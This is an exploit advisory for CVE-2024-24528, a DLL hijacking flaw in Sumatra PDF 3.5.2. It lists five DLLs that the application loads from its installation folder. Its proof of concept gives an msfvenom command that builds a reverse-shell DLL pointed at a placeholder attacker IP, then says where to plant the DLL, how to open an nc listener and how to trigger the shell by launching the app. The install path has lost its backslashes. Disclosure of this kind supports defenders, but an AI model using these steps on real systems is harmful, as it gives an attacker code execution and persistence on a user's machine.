Authored by Ravishanka Silva

Sumatra PDF version 3.5.2 suffers from a DLL hijacking vulnerability.

advisories | CVE-2024-24528

# Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking
# Date: 06.02.2024
# Exploit Author: Ravishanka Silva
# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader
# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer
# Version: 3.5.2
# Tested on: Windows 10, Windows 11
# CVE : CVE-2024-24528

Description:
Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.
Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.

A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files:
dbgcore.DLL
profapi.dll
PROPSYS.dll
TextShaping.dll
DWrite.dll

Proof of Concept:

1. Create a malicious .dll file via msfvenom,
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL

2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:Users<username>AppDataLocalSumatraPDF")

3. Start a listener via nc,
nc -lvp 7777

4. Open Sumatra PDF application, and observe the execution of the reverse shell.

Demo:
https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing